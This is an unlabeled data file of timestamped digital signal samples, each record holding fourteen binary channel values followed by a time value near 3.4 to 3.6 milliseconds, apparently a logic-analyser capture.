0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4307840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4308120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4308360e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4308600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4308840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4309080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4309320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4309600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4309840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4310120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4310160e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4310360e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4310600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4310840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4311080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4311320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4311600e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4311640e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4311840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4312120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4312360e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4312600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4312840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4313080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4313320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4313600e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4313640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4313840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4314120e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4314360e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4314600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4315080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4315360e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4315880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4316120e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4316600e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4316840e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4317360e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4317600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4318120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4318360e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4318840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4319080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4319360e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4319600e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4319640e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4319840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4320120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4320360e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4320600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4320840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4321080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4321320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4321600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4321840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4322120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4322160e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4322360e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4322600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4322840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4323080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4323320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4323600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4323840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4324120e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4324360e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4324600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4324840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4325080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4325120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4325320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4325560e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4325640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4325800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4326080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4326320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4326600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4326840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4327080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4327120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4327320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4327560e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4327800e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4328080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4328320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4328600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4328840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4329080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4329160e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4329320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4329560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4329800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4330080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4330600e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4330840e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4331320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4331560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4332080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4332320e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4332840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4333080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4333560e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4333800e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4334320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4334600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4334840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4335080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4335120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4335320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4335560e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4335640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4335800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4336080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4336120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4336320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4336600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4336840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4337080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4337320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4337560e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4337640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4337800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4338080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4338320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4338600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4338840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4339080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4339120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4339320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4339560e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4339800e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4340080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4340320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4340600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4340840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4341080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4341320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4341560e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4341640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4341800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4342080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4342320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4342600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4342840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4343080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4343320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4343560e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4343800e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4344080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4344320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4344600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4344840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4345080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4345160e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4345320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4345560e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4345640e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4345800e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4346080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4346120e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4346320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4346600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4346840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4347080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4347320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4347560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4347800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4348080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4348120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4348320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4348600e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4348640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4348840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4349080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4349120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4349320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4349560e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4349640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4349800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4350080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4350320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4350600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4350840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4351080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4351320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4351560e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4351640e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4351800e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4352080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4352120e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4352320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4352600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4352840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4353080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4353120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4353320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4353560e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4353800e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4354080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4354320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4354600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4354840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4355080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4355160e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4355320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4355560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4355800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4356080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4356120e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4356320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4356600e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4356640e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4356840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4357080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4357320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4357560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4357800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4358080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4358320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4358600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4358840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4359080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4359160e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4359320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4359560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4359800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4360080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4360320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4360600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4360840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4361080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4361320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4361560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4361800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4362080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4362320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4362600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4362840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4363080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4363320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4363560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4363800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4364080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4364320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4364600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4364840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4365080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4365320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4365560e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4365800e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4366080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4366320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4366600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4366840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4367080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4367320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4367560e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.5614120e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.5616280e-03 1,1,0,1,0,0,0,0,0,0,0,1,0,1,3.5616520e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.5616840e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.5619680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.5619960e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.5620200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.5620440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.5620680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.5620920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.5621160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.5621400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.5621680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.5621920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.5622200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5622440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5622680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5622920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5623160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5623400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5623680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5623920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5624200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5624440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5624680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5624920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5625160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5625400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5625680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5625920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5626200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5626440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5626680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5626920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5627160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5627400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5627680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5627920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5628200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5628440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5628680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5628920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5629160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5629400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5629680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5629920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5630200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5630440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5630680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5630920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5631160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5631400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5631680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5631920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5632200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5632440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5632680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5632920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5633160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5633400e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5633480e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5633680e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5633920e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5634200e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5634400e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5634640e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5634920e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5635160e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5635400e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5635640e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5635880e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5636120e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5636400e-03 1,1,0,1,0,1,0,0,0,0,0,0,0,0,3.5636440e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5636480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5636640e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5636920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5637160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5637400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5637640e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5637880e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5638120e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5638400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5638680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5638920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5639160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5639400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5639640e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5639880e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5640120e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5640400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5640680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5640920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5641160e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5641400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5641640e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5641880e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5642120e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5642440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5642680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5642920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5643200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5643440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5643720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5643960e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5644200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5644440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5644680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5644920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5645200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5645440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5645720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5645960e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5646200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5646440e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5646680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5646920e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5647200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5647440e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5647480e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5647720e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5647960e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5648200e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5648440e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5648680e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5648920e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5649200e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5649440e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5649720e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5649960e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.5650200e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.5650480e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5650520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5650720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5651000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5651240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5651480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5651720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5652000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5652200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5652520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5652760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5653000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5653240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5653480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5653720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5654000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5654200e-03 